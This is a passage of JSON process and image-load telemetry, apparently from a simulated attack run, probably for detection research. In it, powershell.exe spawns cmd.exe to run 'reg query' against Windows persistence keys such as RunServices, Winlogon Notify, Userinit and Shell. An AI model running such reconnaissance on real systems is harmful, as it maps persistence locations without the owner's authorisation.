"{42FC7E13-CB0B-5C05-0000-001061AC5001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7408, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311520000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001061AC5001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7408, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311520000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001061AC5001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7408, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311520000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001061AC5001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7408, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311520000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001061AC5001}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 7408, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311520000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001061AC5001}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 7408, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311520000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001061AC5001}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7408, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311520000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001061AC5001}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7408, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311520000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001061AC5001}" - }, - { - "event_type": "process", - "pid": 7408, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883571311520000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001061AC5001}" - }, - { - "event_type": "process", - "pid": 5512, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571311520000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00106DAB5001}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 2528, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571311710000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010B8AD5001}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2528, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571311680000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010B8AD5001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2528, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571311680000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010B8AD5001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2528, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571311680000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010B8AD5001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2528, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571311680000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010B8AD5001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2528, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571311680000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010B8AD5001}" - }, - { - "command_line": "reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5276, - "ppid": 2528, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883571311800000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ACAE5001}", - "unique_ppid": "{42FC7E13-CB0B-5C05-0000-0010B8AD5001}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 5276, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311680000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ACAE5001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5276, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311680000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ACAE5001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5276, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311680000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ACAE5001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5276, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311680000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ACAE5001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5276, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311830000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ACAE5001}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 5276, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311830000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ACAE5001}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 5276, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311830000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ACAE5001}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5276, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311830000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ACAE5001}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5276, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311830000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ACAE5001}" - }, - { - "event_type": "process", - "pid": 5276, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883571311830000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ACAE5001}" - }, - { - "event_type": "process", - "pid": 2528, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571311830000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010B8AD5001}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 6296, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571311970000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001004B05001}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6296, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571311830000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001004B05001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6296, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571311830000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001004B05001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6296, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571311990000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001004B05001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6296, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571311990000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001004B05001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6296, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571311990000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001004B05001}" - }, - { - "command_line": "reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5520, - "ppid": 6296, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883571312070000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010F9B05001}", - "unique_ppid": "{42FC7E13-CB0B-5C05-0000-001004B05001}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 5520, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311990000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010F9B05001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5520, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311990000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010F9B05001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5520, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311990000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010F9B05001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5520, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311990000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010F9B05001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5520, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311990000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010F9B05001}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 5520, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311990000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010F9B05001}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 5520, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311990000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010F9B05001}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5520, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311990000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010F9B05001}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5520, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311990000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010F9B05001}" - }, - { - "event_type": "process", - "pid": 5520, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883571312140000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010F9B05001}" - }, - { - "event_type": "process", - "pid": 6296, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571312140000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001004B05001}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 1860, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571312230000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001052B25001}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1860, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571312140000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001052B25001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1860, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571312140000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001052B25001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1860, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571312140000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001052B25001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1860, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571312140000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001052B25001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1860, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571312140000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001052B25001}" - }, - { - "command_line": "reg query HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6328, - "ppid": 1860, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883571312320000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001046B35001}", - "unique_ppid": "{42FC7E13-CB0B-5C05-0000-001052B25001}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 6328, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571312300000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001046B35001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6328, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571312300000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001046B35001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6328, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571312300000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001046B35001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6328, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571312300000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001046B35001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6328, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571312300000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001046B35001}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 6328, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571312300000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001046B35001}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 6328, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571312300000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001046B35001}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6328, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571312300000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001046B35001}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6328, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571312300000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001046B35001}" - }, - { - "event_type": "process", - "pid": 6328, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883571312300000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001046B35001}" - }, - { - "event_type": "process", - "pid": 1860, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571312300000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001052B25001}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 524, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571312470000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00109AB45001}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 524, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571312460000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00109AB45001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 524, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571312460000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00109AB45001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 524, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571312460000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00109AB45001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 524, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571312460000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00109AB45001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 524, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571312460000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00109AB45001}" - }, - { - "command_line": "reg query HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6052, - "ppid": 524, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883571312560000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00108EB55001}", - "unique_ppid": "{42FC7E13-CB0B-5C05-0000-00109AB45001}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 6052, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571312460000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00108EB55001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6052, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571312460000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00108EB55001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6052, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571312460000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00108EB55001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6052, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571312460000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00108EB55001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6052, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571312460000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00108EB55001}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 6052, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571312460000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00108EB55001}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 6052, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571312460000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00108EB55001}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6052, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571312610000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00108EB55001}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6052, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571312610000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00108EB55001}" - }, - { - "event_type": "process", - "pid": 6052, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883571312610000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00108EB55001}" - }, - { - "event_type": "process", - "pid": 524, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571312610000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00109AB45001}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 4072, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571312720000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010E2B65001}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4072, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571312610000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010E2B65001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4072, - "process_name": 